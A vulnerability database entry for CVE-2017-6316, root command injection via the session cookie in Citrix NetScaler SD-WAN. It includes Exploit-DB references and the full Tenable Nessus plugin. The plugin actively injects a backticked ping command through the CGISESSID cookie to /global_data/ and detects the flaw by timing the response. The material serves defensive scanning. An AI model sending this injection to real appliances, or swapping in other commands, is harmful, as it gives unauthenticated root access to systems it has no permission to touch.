CVE-2017-6316 - Unauthenticated root command injection via session cookie in Citrix NetScaler SD-WAN (formerly CloudBridge)

CVSS 9.8 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH

Summary

Citrix NetScaler SD-WAN devices through v9.1.2.26.561201 allow unauthenticated remote attackers to execute arbitrary shell commands as root via the CGISESSID cookie: the cookie value is passed unsanitized to a shell, so a backtick-quoted command inside it is executed (this is what the public exploits and the Nessus check below do). On CloudBridge (the former name of NetScaler SD-WAN) devices, the cookie name was CAKEPHP rather than CGISESSID.

Exploit-Db

  • description: Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection. CVE-2017-6316. Webapps exploit for CGI platform
    file: exploits/cgi/webapps/42346.txt
    id: EDB-ID:42346
    last seen: 2017-07-19
    modified: 2017-07-19
    platform: cgi
    port:
    published: 2017-07-19
    reporter: Exploit-DB
    source: https://www.exploit-db.com/download/42346/
    title: Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection
    type: webapps
  • description: Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit). CVE-2017-6316. Webapps exploit for CGI platform
    file: exploits/cgi/webapps/42345.rb
    id: EDB-ID:42345
    last seen: 2017-07-19
    modified: 2017-07-19
    platform: cgi
    port:
    published: 2017-07-19
    reporter: Exploit-DB
    source: https://www.exploit-db.com/download/42345/
    title: Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)
    type: webapps

Nessus

NASL family: CGI abuses
NASL id: CITRIX_SDWAN_COOKIE_CMD_INJECTION.NASL
description: The remote Citrix SD-WAN appliance is affected by a remote command injection vulnerability due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this, via a specially crafted cookie in an HTTP request, to execute arbitrary commands on the appliance.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 121386
published: 2019-01-25
reporter: This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/121386
title: Citrix SD-WAN Cookie Command Injection
code
#
# (C) Tenable, Inc.
#

include("compat.inc");

# Plugin registration. Everything inside this branch only describes the
# check (identifiers, references, scoring, scheduling constraints); the
# active test itself begins after this block.
if (description)
{
  script_id(121386);
  script_version("1.5");
  script_cvs_date("Date: 2019/09/03 10:57:21");

  # Cross-references: the CVE, the Bugtraq ID and the Metasploit module
  # published on Exploit-DB as EDB-ID 42345.
  script_cve_id("CVE-2017-6316");
  script_bugtraq_id(99943);
  script_xref(name:"EDB-ID", value:"42345");

  script_name(english:"Citrix SD-WAN Cookie Command Injection");
  # The summary is literal: this plugin sends a payload and has the
  # appliance run a command, rather than inferring exposure from a
  # version banner.
  script_summary(english:"Attempts to execute a command on the remote appliance.");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is affected by a remote command injection
vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote Citrix SD-WAN appliance is affected by a remote command
injection vulnerability due to improper sanitization of user-supplied
input. An unauthenticated, remote attacker can exploit this, via a
specially crafted cookie in an HTTP request, to execute arbitrary
commands on the appliance.");
  # Vendor advisory and the fixed release it names.
  script_set_attribute(attribute:"see_also", value:"https://support.citrix.com/article/CTX225990");
  script_set_attribute(attribute:"solution", value:
"Upgrade to version 9.2.1.1001 or later.");
  # CVSSv2 / CVSSv3 base vectors: network-reachable, low complexity, no
  # authentication or user interaction, full C/I/A impact. The
  # cvss_score_source attribute records that these are taken from the
  # CVE rather than assessed independently.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  # Temporal vectors: functional public exploit (E:F), official fix
  # available (RL:OF / RL:O), confirmed report (RC:C).
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-6316");
  # Public exploit code exists (Exploit-DB, D2 Elliot) and this plugin
  # exploits the flaw itself, which is why it is categorised ACT_ATTACK
  # below.
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"Citrix CloudBridge RCE");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");

  script_set_attribute(attribute:"vuln_publication_date",value:"2017/02/20");
  script_set_attribute(attribute:"patch_publication_date",value:"2017/07/25");
  script_set_attribute(attribute:"plugin_publication_date", value:"2019/01/25");

  script_set_attribute(attribute:"plugin_type",value:"remote");
  script_set_attribute(attribute:"cpe", value:"x-cpe:/a:citrix:sd-wan");
  # Marks that a positive result comes from actually executing a command
  # on the target, not from a version comparison.
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  # ACT_ATTACK: this plugin sends an exploit payload to the target (see
  # script_summary above).
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Only run after the SD-WAN detection plugin has identified the
  # appliance (it populates the installed_sw/Citrix SD-WAN KB key), and
  # only against web ports.
  script_dependencies("citrix_sdwan_detect.nbin");
  script_require_keys("installed_sw/Citrix SD-WAN");
  script_require_ports("Services/www", 80, 443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("install_func.inc");
include("misc_func.inc");
include("http.inc");

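app = 'Citrix SD-WAN';

# Exit if app is not detected on the target host
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:443);

# Exit if app is not detected on this port
install = get_single_install(
  app_name : app,
  port     : port
);

# This check exercises the injection directly: whatever is placed between
# the backticks in the CGISESSID cookie is executed by the appliance's web
# tier (as root, per the advisory). The payload is deliberately limited to
# a ping of localhost so that the only observable effect is a delay; do
# not substitute a command with persistent side effects.
#
# To confirm the vulnerability out of band, replace 192.168.123.123 with
# an IP that is pingable from the target host. Ping requests and replies
# should then be seen in Wireshark:
#
#cmd = 'ping+-c+10+192.168.123.123';

# The injected command is run 4 times by the vulnerable code path and
# takes about 37 seconds in total. delay_threshold is the extra delay,
# in seconds, that the injected request must show over an uninjected one
# before the host is reported.
cmd = 'ping+-c+10+localhost';
cookie = 'CGISESSID=`' + cmd + '`;';
delay_threshold = 30;

http_set_read_timeout(120);

# Baseline request: identical, but with an inert cookie value. A slow or
# overloaded appliance could otherwise exceed the threshold on its own and
# be reported as vulnerable purely because of round-trip time.
t0 = unixtime();
res_base = http_send_recv3(
  method        : 'POST',
  item          : '/global_data/',
  data          : 'action=logout',
  content_type  : 'application/x-www-form-urlencoded',
  add_headers   : make_array('Cookie', 'CGISESSID=nessus;'),
  port          : port,
  exit_on_fail  : TRUE);
baseline = unixtime() - t0;

# Injection attempt. This is sent last so that http_last_sent_request()
# below refers to the request that carried the payload.
t1 = unixtime();
res = http_send_recv3(
  method        : 'POST',
  item          : '/global_data/',
  data          : 'action=logout',
  content_type  : 'application/x-www-form-urlencoded',
  add_headers   : make_array('Cookie', cookie),
  port          : port,
  exit_on_fail  : TRUE);
elapsed = unixtime() - t1;

# A vulnerable logout handler answers with a redirect only after the
# injected command has finished. Require both: a 302 in the status line
# itself (not merely the digits appearing somewhere in the response) and
# a delay attributable to the command rather than to the network.
if (ereg(pattern:"^HTTP/[0-9.]+ +302", string:res[0])
  && (elapsed - baseline) > delay_threshold)
{
  security_report_v4(
    port: port,
    severity: SECURITY_HOLE,
    generic: TRUE,
    request: make_list(http_last_sent_request())
  );
}
else
{
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, build_url(qs:install['path'], port:port));
}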